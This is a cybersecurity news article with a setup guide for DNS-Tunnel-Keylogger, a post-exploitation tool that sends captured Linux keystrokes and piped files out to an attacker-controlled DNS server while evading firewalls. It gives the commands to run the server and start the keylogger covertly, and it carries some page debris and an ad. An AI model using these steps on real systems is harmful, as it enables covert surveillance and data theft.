DNS Tunnel Keylogger – An Offesnsive Post-Exploitation Tool For Pentesters

A new keylogging server and client tool have been released on GitHub for pentesters. The tool utilizes DNS tunneling to transmit keystrokes through firewalls, potentially evading detection covertly.

The tool, DNS-Tunnel-Keylogger, was designed for post-exploitation activities for pentesters and emphasizes lightweight exfiltration and persistence to minimize the chances of being discovered by security systems.

EHA

The server component of the tool is written in Python 3 and requires the installation of dependencies via pip.

It operates by default on UDP port 53, but users can specify a different port using the -p flag. The server’s IP address is used in SOA and NS records to enable other nameservers to locate the server.

Users are instructed to set their domain’s namespace to custom DNS and point it to the exfiltration server’s IP address, effectively setting glue records.

DNS tunneling is a technique for encoding the data of other programs or protocols in DNS queries and responses.

This can be particularly useful for post-exploitation data extraction while avoiding detection and firewall restrictions.

  • Knowledge of DNS and networking concepts
  • Familiarity with Python and Bash scripting
  • A Linux environment for the keylogger client
  • Python3 installed on the server

On the client side, the Linux keylogger consists of two bash scripts. The connection.sh script is responsible for sending the captured keystrokes to the server, while the logger.sh script is used to start the keylogging process.

The keylogger can be started silently, and the shell can be closed upon exit to avoid returning to a non-keylogger state.

Document
Run Free ThreatScan on Your Mailbox

AI-Powered Protection for Business Email Security

Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .

The developers note that the keylogger will not run in non-interactive shells and that the Windows Dns_Query_A function tends to send duplicate requests, although the server is designed to handle this by discarding repeated packets[

DNS Tunnel Keylogger – Server Setup

Step 1: Clone the Repository

First, you need to clone the DNS-Tunnel-Keylogger repository from GitHub:

git clone https://github.com/Geeoon/DNS-Tunnel-Keylogger.git

Step 2: Install Dependencies

Navigate to the cloned directory and install the required Python dependencies:

cd DNS-Tunnel-Keylogger
python3 -m pip install -r requirements.txt

Step 3: Start the Server

To start the server, use the following command:

python3 main.py <ip> <domain>

Replace <ip> with the IP address of the server and <domain> with the domain that the server is authoritative for.

Server Options:

  • -h, --help: Show the help message and exit.
  • -p PORT, --port PORT: Specify a different port to listen on. By default, the server listens on UDP port 53.

Client Setup (Linux Keylogger)

Step 1: Prepare the Scripts

Ensure that logger.sh and connection.sh are in the same directory. These scripts will capture and send the keystrokes to the server.

Step 2: Start the Keylogger

To start the keylogger, execute the following command:

./logger.sh <domain> && exit

Replace <domain> with the domain to send data to. The && exit will close the shell upon exit to prevent returning to a non-keylogged shell.

Keylogger Options:

  • -p path: Specify the path to the log file to listen to. By default, this is /tmp/.
  • -l: Run the logger with warnings and errors printed, which can be useful for debugging.

Additional Information

Manual Data Transmission

If you wish to send data, such as a file, manually, you can pipe the data to the connection.sh script, which will establish a connection and send the data.

Security Considerations

If used without proper authorization, a keylogger and DNS tunneling can be considered malicious and illegal in many jurisdictions. Ensure you can use these tools in your environment and comply with all relevant laws and ethical guidelines.

Troubleshooting

  • If you encounter issues, remove the &> /dev/null from the keylogger command to display error messages.
  • Check the server’s firewall settings to ensure the DNS port (default 53) is open for incoming and outgoing connections.
  • Please verify that the domain used is correctly configured and that the server is set as authoritative for it.

This guide provides the steps to set up a DNS tunneling keylogger for covert keystroke exfiltration. Remember to use this tool responsibly and within the law.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

Cyber Writes Team
https://www.cyberwrites.com
Work done by a Team Of Security Experts from Cyber Writes (www.cyberwrites.com) - World’s First Dedicated Content-as-a-Service (CaaS) Platform for Cybersecurity. For Exclusive Cyber Security Contents, Reach at: [email protected]